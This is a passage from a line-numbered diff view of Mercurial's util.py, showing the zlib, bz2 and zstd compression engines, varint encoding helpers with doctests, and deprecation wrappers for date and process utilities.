3307 compressed data. Return value is an object with a ``read(size)`` that
3310 returns uncompressed data.
3308 returns uncompressed data.
3311 """
3309 """
3312 raise NotImplementedError()
3310 raise NotImplementedError()
3313
3311
3314 def revlogcompressor(self, opts=None):
3312 def revlogcompressor(self, opts=None):
3315 """Obtain an object that can be used to compress revlog entries.
3313 """Obtain an object that can be used to compress revlog entries.
3316
3314
3317 The object has a ``compress(data)`` method that compresses binary
3315 The object has a ``compress(data)`` method that compresses binary
3318 data. This method returns compressed binary data or ``None`` if
3316 data. This method returns compressed binary data or ``None`` if
3319 the data could not be compressed (too small, not compressible, etc).
3317 the data could not be compressed (too small, not compressible, etc).
3320 The returned data should have a header uniquely identifying this
3318 The returned data should have a header uniquely identifying this
3321 compression format so decompression can be routed to this engine.
3319 compression format so decompression can be routed to this engine.
3322 This header should be identified by the ``revlogheader()`` return
3320 This header should be identified by the ``revlogheader()`` return
3323 value.
3321 value.
3324
3322
3325 The object has a ``decompress(data)`` method that decompresses
3323 The object has a ``decompress(data)`` method that decompresses
3326 data. The method will only be called if ``data`` begins with
3324 data. The method will only be called if ``data`` begins with
3327 ``revlogheader()``. The method should return the raw, uncompressed
3325 ``revlogheader()``. The method should return the raw, uncompressed
3328 data or raise a ``RevlogError``.
3326 data or raise a ``RevlogError``.
3329
3327
3330 The object is reusable but is not thread safe.
3328 The object is reusable but is not thread safe.
3331 """
3329 """
3332 raise NotImplementedError()
3330 raise NotImplementedError()
3333
3331
3334 class _zlibengine(compressionengine):
3332 class _zlibengine(compressionengine):
3335 def name(self):
3333 def name(self):
3336 return 'zlib'
3334 return 'zlib'
3337
3335
3338 def bundletype(self):
3336 def bundletype(self):
3339 """zlib compression using the DEFLATE algorithm.
3337 """zlib compression using the DEFLATE algorithm.
3340
3338
3341 All Mercurial clients should support this format. The compression
3339 All Mercurial clients should support this format. The compression
3342 algorithm strikes a reasonable balance between compression ratio
3340 algorithm strikes a reasonable balance between compression ratio
3343 and size.
3341 and size.
3344 """
3342 """
3345 return 'gzip', 'GZ'
3343 return 'gzip', 'GZ'
3346
3344
3347 def wireprotosupport(self):
3345 def wireprotosupport(self):
3348 return compewireprotosupport('zlib', 20, 20)
3346 return compewireprotosupport('zlib', 20, 20)
3349
3347
3350 def revlogheader(self):
3348 def revlogheader(self):
3351 return 'x'
3349 return 'x'
3352
3350
3353 def compressstream(self, it, opts=None):
3351 def compressstream(self, it, opts=None):
3354 opts = opts or {}
3352 opts = opts or {}
3355
3353
3356 z = zlib.compressobj(opts.get('level', -1))
3354 z = zlib.compressobj(opts.get('level', -1))
3357 for chunk in it:
3355 for chunk in it:
3358 data = z.compress(chunk)
3356 data = z.compress(chunk)
3359 # Not all calls to compress emit data. It is cheaper to inspect
3357 # Not all calls to compress emit data. It is cheaper to inspect
3360 # here than to feed empty chunks through generator.
3358 # here than to feed empty chunks through generator.
3361 if data:
3359 if data:
3362 yield data
3360 yield data
3363
3361
3364 yield z.flush()
3362 yield z.flush()
3365
3363
3366 def decompressorreader(self, fh):
3364 def decompressorreader(self, fh):
3367 def gen():
3365 def gen():
3368 d = zlib.decompressobj()
3366 d = zlib.decompressobj()
3369 for chunk in filechunkiter(fh):
3367 for chunk in filechunkiter(fh):
3370 while chunk:
3368 while chunk:
3371 # Limit output size to limit memory.
3369 # Limit output size to limit memory.
3372 yield d.decompress(chunk, 2 ** 18)
3370 yield d.decompress(chunk, 2 ** 18)
3373 chunk = d.unconsumed_tail
3371 chunk = d.unconsumed_tail
3374
3372
3375 return chunkbuffer(gen())
3373 return chunkbuffer(gen())
3376
3374
3377 class zlibrevlogcompressor(object):
3375 class zlibrevlogcompressor(object):
3378 def compress(self, data):
3376 def compress(self, data):
3379 insize = len(data)
3377 insize = len(data)
3380 # Caller handles empty input case.
3378 # Caller handles empty input case.
3381 assert insize > 0
3379 assert insize > 0
3382
3380
3383 if insize < 44:
3381 if insize < 44:
3384 return None
3382 return None
3385
3383
3386 elif insize <= 1000000:
3384 elif insize <= 1000000:
3387 compressed = zlib.compress(data)
3385 compressed = zlib.compress(data)
3388 if len(compressed) < insize:
3386 if len(compressed) < insize:
3389 return compressed
3387 return compressed
3390 return None
3388 return None
3391
3389
3392 # zlib makes an internal copy of the input buffer, doubling
3390 # zlib makes an internal copy of the input buffer, doubling
3393 # memory usage for large inputs. So do streaming compression
3391 # memory usage for large inputs. So do streaming compression
3394 # on large inputs.
3392 # on large inputs.
3395 else:
3393 else:
3396 z = zlib.compressobj()
3394 z = zlib.compressobj()
3397 parts = []
3395 parts = []
3398 pos = 0
3396 pos = 0
3399 while pos < insize:
3397 while pos < insize:
3400 pos2 = pos + 2**20
3398 pos2 = pos + 2**20
3401 parts.append(z.compress(data[pos:pos2]))
3399 parts.append(z.compress(data[pos:pos2]))
3402 pos = pos2
3400 pos = pos2
3403 parts.append(z.flush())
3401 parts.append(z.flush())
3404
3402
3405 if sum(map(len, parts)) < insize:
3403 if sum(map(len, parts)) < insize:
3406 return ''.join(parts)
3404 return ''.join(parts)
3407 return None
3405 return None
3408
3406
3409 def decompress(self, data):
3407 def decompress(self, data):
3410 try:
3408 try:
3411 return zlib.decompress(data)
3409 return zlib.decompress(data)
3412 except zlib.error as e:
3410 except zlib.error as e:
3413 raise error.RevlogError(_('revlog decompress error: %s') %
3411 raise error.RevlogError(_('revlog decompress error: %s') %
3414 stringutil.forcebytestr(e))
3412 stringutil.forcebytestr(e))
3415
3413
3416 def revlogcompressor(self, opts=None):
3414 def revlogcompressor(self, opts=None):
3417 return self.zlibrevlogcompressor()
3415 return self.zlibrevlogcompressor()
3418
3416
3419 compengines.register(_zlibengine())
3417 compengines.register(_zlibengine())
3420
3418
3421 class _bz2engine(compressionengine):
3419 class _bz2engine(compressionengine):
3422 def name(self):
3420 def name(self):
3423 return 'bz2'
3421 return 'bz2'
3424
3422
3425 def bundletype(self):
3423 def bundletype(self):
3426 """An algorithm that produces smaller bundles than ``gzip``.
3424 """An algorithm that produces smaller bundles than ``gzip``.
3427
3425
3428 All Mercurial clients should support this format.
3426 All Mercurial clients should support this format.
3429
3427
3430 This engine will likely produce smaller bundles than ``gzip`` but
3428 This engine will likely produce smaller bundles than ``gzip`` but
3431 will be significantly slower, both during compression and
3429 will be significantly slower, both during compression and
3432 decompression.
3430 decompression.
3433
3431
3434 If available, the ``zstd`` engine can yield similar or better
3432 If available, the ``zstd`` engine can yield similar or better
3435 compression at much higher speeds.
3433 compression at much higher speeds.
3436 """
3434 """
3437 return 'bzip2', 'BZ'
3435 return 'bzip2', 'BZ'
3438
3436
3439 # We declare a protocol name but don't advertise by default because
3437 # We declare a protocol name but don't advertise by default because
3440 # it is slow.
3438 # it is slow.
3441 def wireprotosupport(self):
3439 def wireprotosupport(self):
3442 return compewireprotosupport('bzip2', 0, 0)
3440 return compewireprotosupport('bzip2', 0, 0)
3443
3441
3444 def compressstream(self, it, opts=None):
3442 def compressstream(self, it, opts=None):
3445 opts = opts or {}
3443 opts = opts or {}
3446 z = bz2.BZ2Compressor(opts.get('level', 9))
3444 z = bz2.BZ2Compressor(opts.get('level', 9))
3447 for chunk in it:
3445 for chunk in it:
3448 data = z.compress(chunk)
3446 data = z.compress(chunk)
3449 if data:
3447 if data:
3450 yield data
3448 yield data
3451
3449
3452 yield z.flush()
3450 yield z.flush()
3453
3451
3454 def decompressorreader(self, fh):
3452 def decompressorreader(self, fh):
3455 def gen():
3453 def gen():
3456 d = bz2.BZ2Decompressor()
3454 d = bz2.BZ2Decompressor()
3457 for chunk in filechunkiter(fh):
3455 for chunk in filechunkiter(fh):
3458 yield d.decompress(chunk)
3456 yield d.decompress(chunk)
3459
3457
3460 return chunkbuffer(gen())
3458 return chunkbuffer(gen())
3461
3459
3462 compengines.register(_bz2engine())
3460 compengines.register(_bz2engine())
3463
3461
3464 class _truncatedbz2engine(compressionengine):
3462 class _truncatedbz2engine(compressionengine):
3465 def name(self):
3463 def name(self):
3466 return 'bz2truncated'
3464 return 'bz2truncated'
3467
3465
3468 def bundletype(self):
3466 def bundletype(self):
3469 return None, '_truncatedBZ'
3467 return None, '_truncatedBZ'
3470
3468
3471 # We don't implement compressstream because it is hackily handled elsewhere.
3469 # We don't implement compressstream because it is hackily handled elsewhere.
3472
3470
3473 def decompressorreader(self, fh):
3471 def decompressorreader(self, fh):
3474 def gen():
3472 def gen():
3475 # The input stream doesn't have the 'BZ' header. So add it back.
3473 # The input stream doesn't have the 'BZ' header. So add it back.
3476 d = bz2.BZ2Decompressor()
3474 d = bz2.BZ2Decompressor()
3477 d.decompress('BZ')
3475 d.decompress('BZ')
3478 for chunk in filechunkiter(fh):
3476 for chunk in filechunkiter(fh):
3479 yield d.decompress(chunk)
3477 yield d.decompress(chunk)
3480
3478
3481 return chunkbuffer(gen())
3479 return chunkbuffer(gen())
3482
3480
3483 compengines.register(_truncatedbz2engine())
3481 compengines.register(_truncatedbz2engine())
3484
3482
3485 class _noopengine(compressionengine):
3483 class _noopengine(compressionengine):
3486 def name(self):
3484 def name(self):
3487 return 'none'
3485 return 'none'
3488
3486
3489 def bundletype(self):
3487 def bundletype(self):
3490 """No compression is performed.
3488 """No compression is performed.
3491
3489
3492 Use this compression engine to explicitly disable compression.
3490 Use this compression engine to explicitly disable compression.
3493 """
3491 """
3494 return 'none', 'UN'
3492 return 'none', 'UN'
3495
3493
3496 # Clients always support uncompressed payloads. Servers don't because
3494 # Clients always support uncompressed payloads. Servers don't because
3497 # unless you are on a fast network, uncompressed payloads can easily
3495 # unless you are on a fast network, uncompressed payloads can easily
3498 # saturate your network pipe.
3496 # saturate your network pipe.
3499 def wireprotosupport(self):
3497 def wireprotosupport(self):
3500 return compewireprotosupport('none', 0, 10)
3498 return compewireprotosupport('none', 0, 10)
3501
3499
3502 # We don't implement revlogheader because it is handled specially
3500 # We don't implement revlogheader because it is handled specially
3503 # in the revlog class.
3501 # in the revlog class.
3504
3502
3505 def compressstream(self, it, opts=None):
3503 def compressstream(self, it, opts=None):
3506 return it
3504 return it
3507
3505
3508 def decompressorreader(self, fh):
3506 def decompressorreader(self, fh):
3509 return fh
3507 return fh
3510
3508
3511 class nooprevlogcompressor(object):
3509 class nooprevlogcompressor(object):
3512 def compress(self, data):
3510 def compress(self, data):
3513 return None
3511 return None
3514
3512
3515 def revlogcompressor(self, opts=None):
3513 def revlogcompressor(self, opts=None):
3516 return self.nooprevlogcompressor()
3514 return self.nooprevlogcompressor()
3517
3515
3518 compengines.register(_noopengine())
3516 compengines.register(_noopengine())
3519
3517
3520 class _zstdengine(compressionengine):
3518 class _zstdengine(compressionengine):
3521 def name(self):
3519 def name(self):
3522 return 'zstd'
3520 return 'zstd'
3523
3521
3524 @propertycache
3522 @propertycache
3525 def _module(self):
3523 def _module(self):
3526 # Not all installs have the zstd module available. So defer importing
3524 # Not all installs have the zstd module available. So defer importing
3527 # until first access.
3525 # until first access.
3528 try:
3526 try:
3529 from . import zstd
3527 from . import zstd
3530 # Force delayed import.
3528 # Force delayed import.
3531 zstd.__version__
3529 zstd.__version__
3532 return zstd
3530 return zstd
3533 except ImportError:
3531 except ImportError:
3534 return None
3532 return None
3535
3533
3536 def available(self):
3534 def available(self):
3537 return bool(self._module)
3535 return bool(self._module)
3538
3536
3539 def bundletype(self):
3537 def bundletype(self):
3540 """A modern compression algorithm that is fast and highly flexible.
3538 """A modern compression algorithm that is fast and highly flexible.
3541
3539
3542 Only supported by Mercurial 4.1 and newer clients.
3540 Only supported by Mercurial 4.1 and newer clients.
3543
3541
3544 With the default settings, zstd compression is both faster and yields
3542 With the default settings, zstd compression is both faster and yields
3545 better compression than ``gzip``. It also frequently yields better
3543 better compression than ``gzip``. It also frequently yields better
3546 compression than ``bzip2`` while operating at much higher speeds.
3544 compression than ``bzip2`` while operating at much higher speeds.
3547
3545
3548 If this engine is available and backwards compatibility is not a
3546 If this engine is available and backwards compatibility is not a
3549 concern, it is likely the best available engine.
3547 concern, it is likely the best available engine.
3550 """
3548 """
3551 return 'zstd', 'ZS'
3549 return 'zstd', 'ZS'
3552
3550
3553 def wireprotosupport(self):
3551 def wireprotosupport(self):
3554 return compewireprotosupport('zstd', 50, 50)
3552 return compewireprotosupport('zstd', 50, 50)
3555
3553
3556 def revlogheader(self):
3554 def revlogheader(self):
3557 return '\x28'
3555 return '\x28'
3558
3556
3559 def compressstream(self, it, opts=None):
3557 def compressstream(self, it, opts=None):
3560 opts = opts or {}
3558 opts = opts or {}
3561 # zstd level 3 is almost always significantly faster than zlib
3559 # zstd level 3 is almost always significantly faster than zlib
3562 # while providing no worse compression. It strikes a good balance
3560 # while providing no worse compression. It strikes a good balance
3563 # between speed and compression.
3561 # between speed and compression.
3564 level = opts.get('level', 3)
3562 level = opts.get('level', 3)
3565
3563
3566 zstd = self._module
3564 zstd = self._module
3567 z = zstd.ZstdCompressor(level=level).compressobj()
3565 z = zstd.ZstdCompressor(level=level).compressobj()
3568 for chunk in it:
3566 for chunk in it:
3569 data = z.compress(chunk)
3567 data = z.compress(chunk)
3570 if data:
3568 if data:
3571 yield data
3569 yield data
3572
3570
3573 yield z.flush()
3571 yield z.flush()
3574
3572
3575 def decompressorreader(self, fh):
3573 def decompressorreader(self, fh):
3576 zstd = self._module
3574 zstd = self._module
3577 dctx = zstd.ZstdDecompressor()
3575 dctx = zstd.ZstdDecompressor()
3578 return chunkbuffer(dctx.read_from(fh))
3576 return chunkbuffer(dctx.read_from(fh))
3579
3577
3580 class zstdrevlogcompressor(object):
3578 class zstdrevlogcompressor(object):
3581 def __init__(self, zstd, level=3):
3579 def __init__(self, zstd, level=3):
3582 # TODO consider omitting frame magic to save 4 bytes.
3580 # TODO consider omitting frame magic to save 4 bytes.
3583 # This writes content sizes into the frame header. That is
3581 # This writes content sizes into the frame header. That is
3584 # extra storage. But it allows a correct size memory allocation
3582 # extra storage. But it allows a correct size memory allocation
3585 # to hold the result.
3583 # to hold the result.
3586 self._cctx = zstd.ZstdCompressor(level=level)
3584 self._cctx = zstd.ZstdCompressor(level=level)
3587 self._dctx = zstd.ZstdDecompressor()
3585 self._dctx = zstd.ZstdDecompressor()
3588 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3586 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3589 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3587 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3590
3588
3591 def compress(self, data):
3589 def compress(self, data):
3592 insize = len(data)
3590 insize = len(data)
3593 # Caller handles empty input case.
3591 # Caller handles empty input case.
3594 assert insize > 0
3592 assert insize > 0
3595
3593
3596 if insize < 50:
3594 if insize < 50:
3597 return None
3595 return None
3598
3596
3599 elif insize <= 1000000:
3597 elif insize <= 1000000:
3600 compressed = self._cctx.compress(data)
3598 compressed = self._cctx.compress(data)
3601 if len(compressed) < insize:
3599 if len(compressed) < insize:
3602 return compressed
3600 return compressed
3603 return None
3601 return None
3604 else:
3602 else:
3605 z = self._cctx.compressobj()
3603 z = self._cctx.compressobj()
3606 chunks = []
3604 chunks = []
3607 pos = 0
3605 pos = 0
3608 while pos < insize:
3606 while pos < insize:
3609 pos2 = pos + self._compinsize
3607 pos2 = pos + self._compinsize
3610 chunk = z.compress(data[pos:pos2])
3608 chunk = z.compress(data[pos:pos2])
3611 if chunk:
3609 if chunk:
3612 chunks.append(chunk)
3610 chunks.append(chunk)
3613 pos = pos2
3611 pos = pos2
3614 chunks.append(z.flush())
3612 chunks.append(z.flush())
3615
3613
3616 if sum(map(len, chunks)) < insize:
3614 if sum(map(len, chunks)) < insize:
3617 return ''.join(chunks)
3615 return ''.join(chunks)
3618 return None
3616 return None
3619
3617
3620 def decompress(self, data):
3618 def decompress(self, data):
3621 insize = len(data)
3619 insize = len(data)
3622
3620
3623 try:
3621 try:
3624 # This was measured to be faster than other streaming
3622 # This was measured to be faster than other streaming
3625 # decompressors.
3623 # decompressors.
3626 dobj = self._dctx.decompressobj()
3624 dobj = self._dctx.decompressobj()
3627 chunks = []
3625 chunks = []
3628 pos = 0
3626 pos = 0
3629 while pos < insize:
3627 while pos < insize:
3630 pos2 = pos + self._decompinsize
3628 pos2 = pos + self._decompinsize
3631 chunk = dobj.decompress(data[pos:pos2])
3629 chunk = dobj.decompress(data[pos:pos2])
3632 if chunk:
3630 if chunk:
3633 chunks.append(chunk)
3631 chunks.append(chunk)
3634 pos = pos2
3632 pos = pos2
3635 # Frame should be exhausted, so no finish() API.
3633 # Frame should be exhausted, so no finish() API.
3636
3634
3637 return ''.join(chunks)
3635 return ''.join(chunks)
3638 except Exception as e:
3636 except Exception as e:
3639 raise error.RevlogError(_('revlog decompress error: %s') %
3637 raise error.RevlogError(_('revlog decompress error: %s') %
3640 stringutil.forcebytestr(e))
3638 stringutil.forcebytestr(e))
3641
3639
3642 def revlogcompressor(self, opts=None):
3640 def revlogcompressor(self, opts=None):
3643 opts = opts or {}
3641 opts = opts or {}
3644 return self.zstdrevlogcompressor(self._module,
3642 return self.zstdrevlogcompressor(self._module,
3645 level=opts.get('level', 3))
3643 level=opts.get('level', 3))
3646
3644
3647 compengines.register(_zstdengine())
3645 compengines.register(_zstdengine())
3648
3646
3649 def bundlecompressiontopics():
3647 def bundlecompressiontopics():
3650 """Obtains a list of available bundle compressions for use in help."""
3648 """Obtains a list of available bundle compressions for use in help."""
3651 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3649 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3652 items = {}
3650 items = {}
3653
3651
3654 # We need to format the docstring. So use a dummy object/type to hold it
3652 # We need to format the docstring. So use a dummy object/type to hold it
3655 # rather than mutating the original.
3653 # rather than mutating the original.
3656 class docobject(object):
3654 class docobject(object):
3657 pass
3655 pass
3658
3656
3659 for name in compengines:
3657 for name in compengines:
3660 engine = compengines[name]
3658 engine = compengines[name]
3661
3659
3662 if not engine.available():
3660 if not engine.available():
3663 continue
3661 continue
3664
3662
3665 bt = engine.bundletype()
3663 bt = engine.bundletype()
3666 if not bt or not bt[0]:
3664 if not bt or not bt[0]:
3667 continue
3665 continue
3668
3666
3669 doc = pycompat.sysstr('``%s``\n %s') % (
3667 doc = pycompat.sysstr('``%s``\n %s') % (
3670 bt[0], engine.bundletype.__doc__)
3668 bt[0], engine.bundletype.__doc__)
3671
3669
3672 value = docobject()
3670 value = docobject()
3673 value.__doc__ = doc
3671 value.__doc__ = doc
3674 value._origdoc = engine.bundletype.__doc__
3672 value._origdoc = engine.bundletype.__doc__
3675 value._origfunc = engine.bundletype
3673 value._origfunc = engine.bundletype
3676
3674
3677 items[bt[0]] = value
3675 items[bt[0]] = value
3678
3676
3679 return items
3677 return items
3680
3678
3681 i18nfunctions = bundlecompressiontopics().values()
3679 i18nfunctions = bundlecompressiontopics().values()
3682
3680
3683 # convenient shortcut
3681 # convenient shortcut
3684 dst = debugstacktrace
3682 dst = debugstacktrace
3685
3683
3686 def safename(f, tag, ctx, others=None):
3684 def safename(f, tag, ctx, others=None):
3687 """
3685 """
3688 Generate a name that it is safe to rename f to in the given context.
3686 Generate a name that it is safe to rename f to in the given context.
3689
3687
3690 f: filename to rename
3688 f: filename to rename
3691 tag: a string tag that will be included in the new name
3689 tag: a string tag that will be included in the new name
3692 ctx: a context, in which the new name must not exist
3690 ctx: a context, in which the new name must not exist
3693 others: a set of other filenames that the new name must not be in
3691 others: a set of other filenames that the new name must not be in
3694
3692
3695 Returns a file name of the form oldname~tag[~number] which does not exist
3693 Returns a file name of the form oldname~tag[~number] which does not exist
3696 in the provided context and is not in the set of other names.
3694 in the provided context and is not in the set of other names.
3697 """
3695 """
3698 if others is None:
3696 if others is None:
3699 others = set()
3697 others = set()
3700
3698
3701 fn = '%s~%s' % (f, tag)
3699 fn = '%s~%s' % (f, tag)
3702 if fn not in ctx and fn not in others:
3700 if fn not in ctx and fn not in others:
3703 return fn
3701 return fn
3704 for n in itertools.count(1):
3702 for n in itertools.count(1):
3705 fn = '%s~%s~%s' % (f, tag, n)
3703 fn = '%s~%s~%s' % (f, tag, n)
3706 if fn not in ctx and fn not in others:
3704 if fn not in ctx and fn not in others:
3707 return fn
3705 return fn
3708
3706
3709 def readexactly(stream, n):
3707 def readexactly(stream, n):
3710 '''read n bytes from stream.read and abort if less was available'''
3708 '''read n bytes from stream.read and abort if less was available'''
3711 s = stream.read(n)
3709 s = stream.read(n)
3712 if len(s) < n:
3710 if len(s) < n:
3713 raise error.Abort(_("stream ended unexpectedly"
3711 raise error.Abort(_("stream ended unexpectedly"
3714 " (got %d bytes, expected %d)")
3712 " (got %d bytes, expected %d)")
3715 % (len(s), n))
3713 % (len(s), n))
3716 return s
3714 return s
3717
3715
3718 def uvarintencode(value):
3716 def uvarintencode(value):
3719 """Encode an unsigned integer value to a varint.
3717 """Encode an unsigned integer value to a varint.
3720
3718
3721 A varint is a variable length integer of 1 or more bytes. Each byte
3719 A varint is a variable length integer of 1 or more bytes. Each byte
3722 except the last has the most significant bit set. The lower 7 bits of
3720 except the last has the most significant bit set. The lower 7 bits of
3723 each byte store the 2's complement representation, least significant group
3721 each byte store the 2's complement representation, least significant group
3724 first.
3722 first.
3725
3723
3726 >>> uvarintencode(0)
3724 >>> uvarintencode(0)
3727 '\\x00'
3725 '\\x00'
3728 >>> uvarintencode(1)
3726 >>> uvarintencode(1)
3729 '\\x01'
3727 '\\x01'
3730 >>> uvarintencode(127)
3728 >>> uvarintencode(127)
3731 '\\x7f'
3729 '\\x7f'
3732 >>> uvarintencode(1337)
3730 >>> uvarintencode(1337)
3733 '\\xb9\\n'
3731 '\\xb9\\n'
3734 >>> uvarintencode(65536)
3732 >>> uvarintencode(65536)
3735 '\\x80\\x80\\x04'
3733 '\\x80\\x80\\x04'
3736 >>> uvarintencode(-1)
3734 >>> uvarintencode(-1)
3737 Traceback (most recent call last):
3735 Traceback (most recent call last):
3738 ...
3736 ...
3739 ProgrammingError: negative value for uvarint: -1
3737 ProgrammingError: negative value for uvarint: -1
3740 """
3738 """
3741 if value < 0:
3739 if value < 0:
3742 raise error.ProgrammingError('negative value for uvarint: %d'
3740 raise error.ProgrammingError('negative value for uvarint: %d'
3743 % value)
3741 % value)
3744 bits = value & 0x7f
3742 bits = value & 0x7f
3745 value >>= 7
3743 value >>= 7
3746 bytes = []
3744 bytes = []
3747 while value:
3745 while value:
3748 bytes.append(pycompat.bytechr(0x80 | bits))
3746 bytes.append(pycompat.bytechr(0x80 | bits))
3749 bits = value & 0x7f
3747 bits = value & 0x7f
3750 value >>= 7
3748 value >>= 7
3751 bytes.append(pycompat.bytechr(bits))
3749 bytes.append(pycompat.bytechr(bits))
3752
3750
3753 return ''.join(bytes)
3751 return ''.join(bytes)
3754
3752
3755 def uvarintdecodestream(fh):
3753 def uvarintdecodestream(fh):
3756 """Decode an unsigned variable length integer from a stream.
3754 """Decode an unsigned variable length integer from a stream.
3757
3755
3758 The passed argument is anything that has a ``.read(N)`` method.
3756 The passed argument is anything that has a ``.read(N)`` method.
3759
3757
3760 >>> try:
3758 >>> try:
3761 ... from StringIO import StringIO as BytesIO
3759 ... from StringIO import StringIO as BytesIO
3762 ... except ImportError:
3760 ... except ImportError:
3763 ... from io import BytesIO
3761 ... from io import BytesIO
3764 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3762 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3765 0
3763 0
3766 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3764 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3767 1
3765 1
3768 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3766 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3769 127
3767 127
3770 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3768 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3771 1337
3769 1337
3772 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3770 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3773 65536
3771 65536
3774 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3772 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3775 Traceback (most recent call last):
3773 Traceback (most recent call last):
3776 ...
3774 ...
3777 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3775 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3778 """
3776 """
3779 result = 0
3777 result = 0
3780 shift = 0
3778 shift = 0
3781 while True:
3779 while True:
3782 byte = ord(readexactly(fh, 1))
3780 byte = ord(readexactly(fh, 1))
3783 result |= ((byte & 0x7f) << shift)
3781 result |= ((byte & 0x7f) << shift)
3784 if not (byte & 0x80):
3782 if not (byte & 0x80):
3785 return result
3783 return result
3786 shift += 7
3784 shift += 7
3787
3785
3788 ###
3786 ###
3789 # Deprecation warnings for util.py splitting
3787 # Deprecation warnings for util.py splitting
3790 ###
3788 ###
3791
3789
3792 def _deprecatedfunc(func, version, modname=None):
3790 def _deprecatedfunc(func, version, modname=None):
3793 def wrapped(*args, **kwargs):
3791 def wrapped(*args, **kwargs):
3794 fn = pycompat.sysbytes(func.__name__)
3792 fn = pycompat.sysbytes(func.__name__)
3795 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3793 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3796 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3794 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3797 nouideprecwarn(msg, version, stacklevel=2)
3795 nouideprecwarn(msg, version, stacklevel=2)
3798 return func(*args, **kwargs)
3796 return func(*args, **kwargs)
3799 wrapped.__name__ = func.__name__
3797 wrapped.__name__ = func.__name__
3800 return wrapped
3798 return wrapped
3801
3799
3802 defaultdateformats = dateutil.defaultdateformats
3800 defaultdateformats = dateutil.defaultdateformats
3803 extendeddateformats = dateutil.extendeddateformats
3801 extendeddateformats = dateutil.extendeddateformats
3804 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3802 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3805 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3803 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3806 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3804 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3807 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3805 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3808 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3806 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3809 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3807 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3810 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3808 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3811
3809
3812 stderr = procutil.stderr
3810 stderr = procutil.stderr
3813 stdin = procutil.stdin
3811 stdin = procutil.stdin
3814 stdout = procutil.stdout
3812 stdout = procutil.stdout
3815 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3813 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3816 modname='utils.procutil')
3814 modname='utils.procutil')
3817 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3815 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3818 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3816 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3819 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3817 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3820 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3818 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3821 modname='utils.procutil')
3819 modname='utils.procutil')
3822 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3820 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3823 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3821 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3824 modname='utils.procutil')
3822 modname='utils.procutil')
3825 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3823 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3826 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3824 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3827 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3825 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3828 modname='utils.procutil')
3826 modname='utils.procutil')
3829 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3827 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3830 modname='utils.procutil')
3828 modname='utils.procutil')
3831 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3829 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3832 modname='utils.procutil')
3830 modname='utils.procutil')
3833 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3831 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3834 modname='utils.procutil')
3832 modname='utils.procutil')
3835 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3833 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3836 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
